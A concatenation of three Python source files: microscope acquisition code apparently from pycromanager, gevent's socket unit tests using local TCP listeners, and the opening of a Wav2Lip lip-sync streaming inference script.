elif not isinstance(type(arg_val), type(_JAVA_TYPE_NAME_TO_PYTHON_TYPE[arg_type])):
# if a type that gets converted
valid_method_spec = None
elif type(arg_val) == np.ndarray:
# For ND Arrays, need to make sure data types match
if _ARRAY_TYPE_TO_NUMPY_DTYPE[arg_type] != arg_val.dtype:
valid_method_spec = None
# if valid_method_spec is None:
# break
if valid_method_spec is None:
raise Exception('Incorrect arguments. \nExpected {} \nGot {}'.format(
' or '.join([', '.join(method_spec['arguments']) for method_spec in method_specs]),
', '.join([str(type(a)) for a in fn_args]) ))
return valid_method_spec
def _parse_arg_names(methods, method_name, convert_camel_case):
# dont delete because this is used in the exec
method_name_modified = _camel_case_2_snake_case(method_name) if convert_camel_case else method_name
# all methods with this name and different argument lists
methods_with_name = [m for m in methods if m['name'] == method_name]
min_required_args = 0 if len(methods_with_name) == 1 and len(methods_with_name[0]['arguments']) == 0 else \
min([len(m['arguments']) for m in methods_with_name])
# sort with largest number of args last so lambda at end gets max num args
methods_with_name.sort(key=lambda val: len(val['arguments']))
for method in methods_with_name:
arg_type_hints = []
for typ in method['arguments']:
arg_type_hints.append(_CLASS_NAME_MAPPING[typ]
if typ in _CLASS_NAME_MAPPING else 'object')
lambda_arg_names = []
class_arg_names = []
unique_argument_names = []
for arg_index, hint in enumerate(arg_type_hints):
if hint in unique_argument_names:
# append numbers to end so arg hints have unique names
i = 1
while hint + str(i) in unique_argument_names:
i += 1
hint += str(i)
unique_argument_names.append(hint)
# this is how overloading is handled for now, by making default arguments as none, but
# it might be better to explicitly compare argument types
if arg_index >= min_required_args:
class_arg_names.append(hint + '=' + hint)
lambda_arg_names.append(hint + '=None')
else:
class_arg_names.append(hint)
lambda_arg_names.append(hint)
return lambda_arg_names, unique_argument_names, methods_with_name, method_name_modified
def _camel_case_2_snake_case(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
class Acquisition():
def __init__(self, directory=None, name=None, image_process_fn=None,
pre_hardware_hook_fn=None, post_hardware_hook_fn=None,
magellan_acq_index=None, process=True, debug=False):
"""
:param directory: saving directory for this acquisition. Required unless an image process function will be
implemented that diverts images from saving
:type directory: str
:param name: Saving name for the acquisition. Required unless an image process function will be
implemented that diverts images from saving
:type name: str
:param image_process_fn: image processing function that will be called on each image that gets acquired.
Can either take two arguments (image, metadata) where image is a numpy array and metadata is a dict
containing the corresponding iamge metadata. Or a 4 argument version is accepted, which accepts (image,
metadata, bridge, queue), where bridge and queue are an instance of the pycromanager.acquire.Bridge
object for the purposes of interacting with arbitrary code on the Java side (such as the micro-manager
core), and queue is a Queue objects that holds upcomning acquisition events. Both version must either
return
:param pre_hardware_hook_fn: hook function that will be run just before the hardware is updated before acquiring
a new image. Accepts either one argument (the current acquisition event) or three arguments (current event,
bridge, event Queue)
:param post_hardware_hook_fn: hook function that will be run just before the hardware is updated before acquiring
a new image. Accepts either one argument (the current acquisition event) or three arguments (current event,
bridge, event Queue)
:param magellan_acq_index: run this acquisition using the settings specified at this position in the main
GUI of micro-magellan (micro-manager plugin). This index starts at 0
:type magellan_acq_index: int
:param process: (Experimental) use multiprocessing instead of multithreading for acquisition hooks and image
processors
:type process: boolean
:param debug: print debugging stuff
:type debug: boolean
"""
self.bridge = Bridge(debug=debug)
self._debug = debug
if magellan_acq_index is not None:
magellan_api = self.bridge.get_magellan()
self.acq = magellan_api.create_acquisition(magellan_acq_index)
self._event_queue = None
else:
# TODO: call different constructor if direcotyr and name are None
# Create thread safe queue for events so they can be passed from multiple processes
self._event_queue = multiprocessing.Queue()
core = self.bridge.get_core()
acq_manager = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcquisitionFactory', args=[core])
self.acq = acq_manager.create_acquisition(directory, name)
if image_process_fn is not None:
processor = self.bridge.construct_java_object('org.micromanager.remote.RemoteImageProcessor')
self.acq.add_image_processor(processor)
self._start_processor(processor, image_process_fn, self._event_queue, process=process)
if pre_hardware_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook')
self._start_hook(hook, pre_hardware_hook_fn, self._event_queue, process=process)
self.acq.add_hook(hook, self.acq.BEFORE_HARDWARE_HOOK, args=[self.acq])
if post_hardware_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self.acq])
self._start_hook(hook, post_hardware_hook_fn, self._event_queue, process=process)
self.acq.add_hook(hook, self.acq.AFTER_HARDWARE_HOOK)
self.acq.start()
if magellan_acq_index is None:
event_port = self.acq.get_event_port()
def event_sending_fn():
bridge = Bridge(debug=debug)
event_socket = bridge._connect_push(event_port)
while True:
events = self._event_queue.get(block=True)
if events is None:
#Poison, time to shut down
event_socket.send({'events': [{'special': 'acquisition-end'}]})
event_socket.close()
return
event_socket.send({'events': events if type(events) == list else [events]})
self.event_process = multiprocessing.Process(target=event_sending_fn, args=(), name='Event sending')
# if multiprocessing else threading.Thread(target=event_sending_fn, args=(), name='Event sending')
self.event_process.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._event_queue is not None: #magellan acquisitions dont have this
# this should shut down storage and viewer as apporpriate
self._event_queue.put(None)
#now wait on it to finish
self.await_completion()
def await_completion(self):
"""
Wait for acquisition to finish and resources to be cleaned up
"""
self.acq.close()
def acquire(self, events):
"""
Submit an event or a list of events for acquisition. Optimizations (i.e. taking advantage of
hardware synchronization, where available), will take place across this list of events, but not
over multiple calls of this method. A single event is a python dictionary with a specific structure
:param events: single event (i.e. a dictionary) or a list of events
"""
self._event_queue.put(events)
def _start_hook(self, remote_hook, remote_hook_fn, event_queue, process):
hook_connected_evt = multiprocessing.Event() if process else threading.Event()
pull_port = remote_hook.get_pull_port()
push_port = remote_hook.get_push_port()
def other_thread_fn():
bridge = Bridge(debug=self._debug)
push_socket = bridge._connect_push(pull_port)
pull_socket = bridge._connect_pull(push_port)
hook_connected_evt.set()
while True:
event_msg = pull_socket.receive()
if 'special' in event_msg and event_msg['special'] == 'acquisition-end':
push_socket.send({})
push_socket.close()
pull_socket.close()
return
else:
params = signature(remote_hook_fn).parameters
if len(params) == 1:
new_event_msg = remote_hook_fn(event_msg)
elif len(params) == 3:
new_event_msg = remote_hook_fn(event_msg, bridge, event_queue)
else:
raise Exception('Incorrect number of arguments for hook function. Must be 2 or 4')
push_socket.send(new_event_msg)
hook_thread = multiprocessing.Process(target=other_thread_fn, args=(), name='AcquisitionHook') if process\
else threading.Thread(target=other_thread_fn, args=(), name='AcquisitionHook')
hook_thread.start()
hook_connected_evt.wait() # wait for push/pull sockets to connect
def _start_processor(self, processor, process_fn, event_queue, process):
# this must start first
processor.start_pull()
sockets_connected_evt = multiprocessing.Event() if process else threading.Event()
pull_port = processor.get_pull_port()
push_port = processor.get_push_port()
def other_thread_fn():
bridge = Bridge(debug=self._debug)
push_socket = bridge._connect_push(pull_port)
pull_socket = bridge._connect_pull(push_port)
if self._debug:
print('image processing sockets connected')
sockets_connected_evt.set()
while True:
message = None
while message is None:
message = pull_socket.receive(timeout=30) #check for new message
if 'special' in message and message['special'] == 'finished':
push_socket.send(message) #Continue propagating the finihsed signal
push_socket.close()
pull_socket.close()
return
metadata = message['metadata']
pixels = deserialize_array(message['pixels'])
image = np.reshape(pixels, [metadata['Width'], metadata['Height']])
params = signature(process_fn).parameters
if len(params) == 2:
processed = process_fn(image, metadata)
elif len(params) == 4:
processed = process_fn(image, metadata, bridge, event_queue)
else:
raise Exception('Incorrect number of arguments for image processing function, must be 2 or 4')
if processed is None:
continue
if len(processed) != 2:
raise Exception('If image is returned, it must be of the form (pixel, metadata)')
if not processed[0].dtype == pixels.dtype:
raise Exception('Processed image pixels must have same dtype as input image pixels, '
'but instead they were {} and {}'.format(processed[0].dtype, pixels.dtype))
processed_img = {'pixels': serialize_array(processed[0]), 'metadata': processed[1]}
push_socket.send(processed_img)
self.processor_thread = multiprocessing.Process(target=other_thread_fn, args=(), name='ImageProcessor'
) if multiprocessing else threading.Thread(target=other_thread_fn, args=(), name='ImageProcessor')
self.processor_thread.start()
sockets_connected_evt.wait() # wait for push/pull sockets to connect
processor.start_push()
def multi_d_acquisition_events(num_time_points=1, time_interval_s=0, z_start=None, z_end=None, z_step=None,
channel_group=None, channels=None, channel_exposures_ms=None, xy_positions=None, order='tpcz'):
"""
Convenience function for generating the events of a typical multi-dimensional acquisition (i.e. an
acquisition with some combination of multiple timepoints, channels, z-slices, or xy positions)
:param num_time_points: How many time points if it is a timelapse
:type num_time_points: int
:param time_interval_s: the minimum interval between consecutive time points in seconds. Keep at 0 to go as
fast as possible
:type time_interval_s: float
:param z_start: z-stack starting position, in µm
:type z_start: float
:param z_end: z-stack ending position, in µm
:type z_end: float
:param z_step: step size of z-stack, in µm
:type z_step: float
:param channel_group: name of the channel group (which should correspond to a config group in micro-manager)
:type channel_group: str
:param channels: list of channel names, which correspond to possible settings of the config group (e.g. ['DAPI',
'FITC'])
:type channels: list of strings
:param channel_exposures_ms: list of camera exposure times corresponding to each channel. The length of this list
should be the same as the the length of the list of channels
:type channel_exposures_ms: list of floats or ints
:param xy_positions: N by 2 numpy array where N is the number of XY stage positions, and the 2 are the X and Y
coordinates
:type xy_positions: numpy array
:param order: string that specifies the order of different dimensions. Must have some ordering of the letters
c, t, p, and z. For example, 'tcz' would run a timelapse where z stacks would be acquired at each channel in
series. 'pt' would move to different xy stage positions and run a complete timelapse at each one before moving
to the next
:type order: str
:return: a list of acquisition events to run the specified acquisition
"""
def generate_events(event, order):
if len(order) == 0:
yield event
return
elif order[0] == 't' and num_time_points != 1:
time_indices = np.arange(num_time_points)
for time_index in time_indices:
new_event = copy.deepcopy(event)
new_event['axes']['time'] = time_index
if time_interval_s != 0:
new_event['min_start_time'] = time_index * time_interval_s
yield generate_events(new_event, order[1:])
elif order[0] == 'z' and z_start is not None and z_end is not None and z_step is not None:
z_positions = np.arange(z_start, z_end, z_step)
for z_index, z_position in enumerate(z_positions):
new_event = copy.deepcopy(event)
new_event['axes']['z'] = z_index
new_event['z'] = z_position
yield generate_events(new_event, order[1:])
elif order[0] == 'p' and xy_positions is not None:
for p_index, xy in enumerate(xy_positions):
new_event = copy.deepcopy(event)
new_event['axes']['position'] = p_index
new_event['x'] = xy[0]
new_event['y'] = xy[1]
yield generate_events(new_event, order[1:])
elif order[0] == 'c' and channel_group is not None and channels is not None:
for i in range(len(channels)):
new_event = copy.deepcopy(event)
new_event['channel'] = {'group': channel_group, 'config': channels[i]}
if channel_exposures_ms is not None:
new_event['exposure'] = i
yield generate_events(new_event, order[1:])
else:
#this axis appears to be missing
yield generate_events(event, order[1:])
#collect all events into a single list
base_event = {'axes': {}}
events = []
def appender(next):
if isinstance(next, types.GeneratorType):
for n in next:
appender(n)
else:
events.append(next)
appender(generate_events(base_event, order))
return events
|
test__socket.py
|
# This line can be commented out so that most tests run with the
# system socket for comparison.
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey; monkey.patch_all()
import sys
import array
import socket
import time
import unittest
from functools import wraps
from gevent._compat import reraise
import gevent.testing as greentest
from gevent.testing import six
from gevent.testing import LARGE_TIMEOUT
from gevent.testing import support
from gevent.testing import params
from gevent.testing.sockets import tcp_listener
from gevent.testing.skipping import skipWithoutExternalNetwork
from gevent.testing.skipping import skipOnMacOnCI
# we use threading on purpose so that we can test both regular and
# gevent sockets with the same code
from threading import Thread as _Thread
from threading import Event
errno_types = int
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
self.terminal_exc = None
@wraps(target)
def errors_are_fatal(*args, **kwargs):
try:
return target(*args, **kwargs)
except: # pylint:disable=bare-except
self.terminal_exc = sys.exc_info()
raise
_Thread.__init__(self, target=errors_are_fatal, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
if '-v' in sys.argv:
printed = []
try:
from time import perf_counter as now
except ImportError:
from time import time as now
def log(*args):
if not printed:
print()
printed.append(1)
print("\t ->", now(), *args)
orig_cot = self._close_on_teardown
def cot(o):
log("Registering for teardown", o)
def c():
log("Closing on teardown", o)
o.close()
orig_cot(c)
return o
self._close_on_teardown = cot
else:
def log(*_args):
"Does nothing"
self.log = log
self.listener = self._close_on_teardown(self._setup_listener())
# It is important to watch the lifetimes of socket objects and
# ensure that:
# (1) they are closed; and
# (2) *before* the next test begins.
#
# For example, it's a bad bad thing to leave a greenlet running past the
# scope of the individual test method if that greenlet will close
# a socket object --- especially if that socket object might also have been
# closed explicitly.
#
# On Windows, we've seen issue with filenos getting reused while something
# still thinks they have the original fileno around. When they later
# close that fileno, a completely unrelated object is closed.
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
return tcp_listener()
def create_connection(self, host=None, port=None, timeout=None,
blocking=None):
sock = self._close_on_teardown(socket.socket())
sock.connect((host or params.DEFAULT_CONNECT, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return sock
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
# pylint:disable=too-many-locals,too-many-branches,too-many-statements
log = self.log
log("Sendall", client_method)
read_data = []
accepted_event = Event()
def accept_and_read():
log("accepting", self.listener)
conn, _ = self.listener.accept()
try:
with conn.makefile(mode='rb') as r:
log("accepted on server", conn)
accepted_event.set()
log("reading")
read_data.append(r.read())
log("done reading")
del r
finally:
conn.close()
del conn
server = Thread(target=accept_and_read)
try:
log("creating client connection")
client = self.create_connection(**client_args)
# We seem to have a buffer stuck somewhere on appveyor?
# https://ci.appveyor.com/project/denik/gevent/builds/27320824/job/bdbax88sqnjoti6i#L712
should_unwrap = hasattr(client, 'unwrap') and greentest.PY37 and greentest.WIN
# The implicit reference-based nastiness of Python 2
# sockets interferes, especially when using SSL sockets.
# The best way to get a decent FIN to the server is to shutdown
# the output. Doing that on Python 3, OTOH, is contraindicated
# except on PyPy.
should_shutdown = greentest.PY2 or greentest.PYPY
# It's important to wait for the server to fully accept before
# we shutdown and close the socket. In SSL mode, the number
# and timing of data exchanges to complete the handshake and
# thus exactly when greenlet switches occur, varies by TLS version.
#
# It turns out that on < TLS1.3, we were getting lucky and the
# server was the greenlet that raced ahead and blocked in r.read()
# before the client returned from create_connection().
#
# But when TLS 1.3 was deployed (OpenSSL 1.1), the *client* was the
# one that raced ahead while the server had yet to return from
# self.listener.accept(). So the client sent the data to the socket,
# and closed, before the server could do anything, and the server,
# when it got switched to by server.join(), found its new socket
# dead.
accepted_event.wait()
log("accepted", client)
try:
getattr(client, client_method)(data)
except:
import traceback; traceback.print_exc()
# unwrapping might not work after this because we're in
# a bad state.
if should_unwrap:
client.shutdown(socket.SHUT_RDWR)
should_unwrap = False
should_shutdown = False
raise
finally:
log("shutdown")
if should_shutdown:
client.shutdown(socket.SHUT_RDWR)
elif should_unwrap:
try:
client.unwrap()
except OSError as e:
if greentest.PY37 and greentest.WIN and e.errno == 0:
# ? 3.7.4 on AppVeyor sometimes raises
# "OSError[errno 0] Error" here, which doesn't make
# any sense.
pass
else:
raise
log("closing")
client.close()
finally:
server.join(10)
assert not server.is_alive()
if server.terminal_exc:
reraise(*server.terminal_exc)
if match_data is None:
match_data = self.long_data
read_data = read_data[0].split(b',')
match_data = match_data.split(b',')
self.assertEqual(read_data, match_data)
def test_sendall_str(self):
self._test_sendall(self.long_data)
if six.PY2:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
@skipOnMacOnCI("Sometimes fails for no apparent reason (buffering?)")
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
remote_client, _ = self.listener.accept()
self._close_on_teardown(remote_client)
# start reading, then, while reading, start writing. the reader should not hang forever
sender = Thread(target=remote_client.sendall,
args=((b't' * N),))
try:
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
finally:
sender.join()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = self._close_on_teardown(client.makefile())
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
def accept():
# make sure the conn object stays alive until the end;
# premature closing triggers a ResourceWarning and
# EOF on the client.
conn, _ = self.listener.accept()
self._close_on_teardown(conn)
acceptor = Thread(target=accept)
client = self.create_connection()
try:
client.settimeout(1)
start = time.time()
with self.assertRaises(self.TIMEOUT_ERROR):
client.recv(1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
finally:
acceptor.join()
# Subclasses can disable this
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
# In 2018, this needs to be increased *again* as a smaller value was
# still often being sent.
_test_sendall_data = b'hello' * 100000000
# This doesn't make much sense...why are we really skipping this?
@greentest.skipOnWindows("On Windows send() accepts whatever is thrown at it")
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
with self.assertRaises(self.TIMEOUT_ERROR):
client.sendall(self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
self.assertTimeWithinRange(took, 0.09, 0.2)
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
finally:
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
finally:
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.type)
self.assertEqual(socket.SOCK_DGRAM, s.family)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.AF_INET, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, support.find_unused_port()))
self.assertIsInstance(ret, errno_types)
finally:
s.close()
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', support.find_unused_port()))
finally:
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
finally:
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC # pylint:disable=no-member
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
try:
s.connect((params.DEFAULT_CONNECT, self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
finally:
acceptor.join()
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self, **conn_args):
connect_port = support.find_unused_port()
with self.assertRaisesRegex(
socket.error,
# We really expect "connection refused". It's unclear
# where/why we would get '[errno -2] name or service
# not known' but it seems some systems generate that.
# https://github.com/gevent/gevent/issues/1389 Somehow
# extremly rarely we've also seen 'address already in
# use', which makes even less sense. The manylinux
# 2010 environment produces 'errno 99 Cannot assign
# requested address', which, I guess?
'refused|not known|already in use|assign'
):
socket.create_connection(
(greentest.DEFAULT_BIND_ADDR, connect_port),
timeout=30,
**conn_args
)
def test_refuses_from_port(self):
source_port = support.find_unused_port()
# Usually we don't want to bind/connect to '', but
# using it as the source is required if we don't want to hang,
# at least on some systems (OS X)
self.test_refuses(source_address=('', source_port))
@greentest.ignores_leakcheck
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E(_)
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gevent.socket.timeout):
gevent.socket.wait(io(), timeout=0.01) # pylint:disable=no-member
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
inference_webstreaming.py
|
import numpy as np
import scipy, cv2, os, sys, argparse, audio
import json, subprocess, random, string
from tqdm import tqdm
from glob import glob
import torch, face_detection
from models import Wav2Lip
import platform
# from flask import Response, Flask, render_template
import threading
import subprocess
import zipfile
import os
import argparse
import ffmpeg
import datetime
import time
import cv2
import wave
import logging
sys.path.insert(1, 'util')
from ffmpeg_stream import *
parser = argparse.ArgumentParser(description='Inference code to lip-sync videos in the wild using Wav2Lip models')
parser.add_argument('--checkpoint_path', type=str,
help='Name of saved checkpoint to load weights from', required=True)
parser.add_argument('--face', type=str,
help='Filepath of video/image that contains faces to use', required=True)
parser.add_argument('--audio', type=str,
help='Filepath of video/audio file to use as raw audio source', required=True)
# parser.add_argument('--outfile', type=str, help='Video path to save result. See default for an e.g.',
# default='results/result_voice.mp4')
parser.add_argument('--static', type=bool,
help='If True, then use only first video frame for inference', default=False)
parser.add_argument('--fps', type=float, help='Can be specified only if input is a static image (default: 25)',
default=25., required=False)
parser.add_argument('--pads', nargs='+', type=int, default=[0, 10, 0, 0],
help='Padding (top, bottom, left, right). Please adjust to include chin at least')
parser.add_argument('--face_det_batch_size', type=int,
help='Batch size for face detection', default=16)
parser.add_argument('--wav2lip_batch_size', type=int, help='Batch size for Wav2Lip model(s)', default=128)
parser.add_argument('--resize_factor', default=1, type=int,
help='Reduce the resolution by this factor. Sometimes, best results are obtained at 480p or 720p')
parser.add_argument('--crop', nargs='+', type=int, default=[0, -1, 0, -1],
help='Crop video to a smaller region (top, bottom, left, right). Applied after resize_factor and rotate arg. '
'Useful if multiple face present. -1 implies the value will be auto-inferred based on height, width')
parser.add_argument('--box', nargs='+', type=int, default=[-1, -1, -1, -1],
help='Specify a constant bounding box for the face. Use only as a last resort if the face is not detected.'
'Also, might work only if the face is not moving around much. Syntax: (top, bottom, left, right).')
parser.add_argument('--rotate', default=False, action='store_true',
help='Sometimes videos taken from a phone can be flipped 90deg. If true, will flip video right by 90deg.'
'Use if you get a flipped result, despite feeding a normal looking video')
parser.add_argument('--nosmooth', default=False, action='store_true',
help='Prevent smoothing face detections over a short temporal window')
# IP and Port for Video Streaming
parser.add_argument("-i", "--ip", type=str, default="0.0.0.0", #172.24.92.25
help="ip address of the device")
parser.add_argument("-o", "--port", type=int, default=8080,
help="ephemeral port number of the server (1024 to 65535)")
args = parser.parse_args()
args.img_size = 96
args.audio_sr = 16000
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if os.path.isfile(args.face) and args.face.split('.')[1] in ['jpg', 'png', 'jpeg']:
args.static = True
def get_smoothened_boxes(boxes, T):
for i in range(len(boxes)):
if i + T > len(boxes):
window = boxes[len(boxes) - T:]
else:
window = boxes[i: i + T]
boxes[i] = np.mean(window, axis=0)
return boxes
def face_detect(images):
detector = face_detection.FaceAlignment(face_detection.LandmarksType._2D,
flip_input=False, device=device)
batch_size = args.face_det_batch_size
while 1:
predictions = []
try:
for i in range(0, len(images), batch_size):
predictions.extend(detector.get_detections_for_batch(np.array(images[i:i + batch_size])))
except RuntimeError:
if batch_size == 1:
raise RuntimeError(
'Image too big to run face detection on GPU. Please use the --resize_factor argument')
batch_size //= 2
print('Recovering from OOM error; New batch size: {}'.format(batch_size))
continue
break
results = []
pady1, pady2, padx1, padx2 = args.pads
for rect, image in zip(predictions, images):
if rect is None:
cv2.imwrite('temp/faulty_frame.jpg', image) # check this frame where the face was not detected.
raise ValueError('Face not detected! Ensure the video contains a face in all the frames.')
y1 = max(0, rect[1] - pady1)
y2 = min(image.shape[0], rect[3] + pady2)
x1 = max(0, rect[0] - padx1)
x2 = min(image.shape[1], rect[2] + padx2)
results.append([x1, y1, x2, y2])
boxes = np.array(results)
if not args.nosmooth: boxes = get_smoothened_boxes(boxes, T=5)
results = [[image[y1: y2, x1:x2], (y1, y2, x1, x2)] for image, (x1, y1, x2, y2) in zip(images, boxes)]
del detector
return results
def face_detect_wrapper(frames):
if args.box[0] == -1:
if not args.static:
face_det_results = face_detect(frames) # BGR2RGB for CNN face detection
else:
face_det_results = face_detect([frames[0]])
else:
print('Using the specified bounding box instead of face detection...')
y1, y2, x1, x2 = args.box
face_det_results = [[f[y1: y2, x1:x2], (y1, y2, x1, x2)] for f in frames]
return face_det_results
def datagen(frames, face_det_results, mels, start_frame_idx):
# start frame idx is the current frame idx in the output video
# we start from this point
img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
start_frame_idx = start_frame_idx%len(frames) # loop back
num_frames = len(mels)
# take frames from start_frame_idx to start_frame_idx+num_frames
# wrapping around if necessary
if not args.static:
if len(frames) == 1:
frames_current = frames
face_det_results_current = face_det_results
if start_frame_idx + num_frames > len(frames):
frames_current = frames[start_frame_idx:] + frames[:start_frame_idx + num_frames-len(frames)]
face_det_results_current = face_det_results[start_frame_idx:] + face_det_results[:start_frame_idx + num_frames-len(frames)]
else:
frames_current = frames[start_frame_idx:start_frame_idx+num_frames]
face_det_results_current = face_det_results[start_frame_idx:start_frame_idx+num_frames]
else:
frames_current = frames
face_det_results_current = face_det_results
for i, m in enumerate(mels):
idx = 0 if args.static else i % len(frames_current)
frame_to_save = frames_current[idx].copy()
face, coords = face_det_results_current[idx].copy()
face = cv2.resize(face, (args.img_size, args.img_size))
img_batch.append(face)
mel_batch.append(m)
frame_batch.append(frame_to_save)
coords_batch.append(coords)
if len(img_batch) >= args.wav2lip_batch_size:
img_batch, mel_batch = np.asarray(img_batch), np.asarray(mel_batch)
img_masked = img_batch.copy()
img_masked[:, args.img_size // 2:] = 0
img_batch = np.concatenate((img_masked, img_batch), axis=3) / 255.
mel_batch = np.reshape(mel_batch, [len(mel_batch), mel_batch.shape[1], mel_batch.shape[2], 1])
yield img_batch, mel_batch, frame_batch, coords_batch
img_batch, mel_batch, frame_batch, coords_batch = [], [], [], []
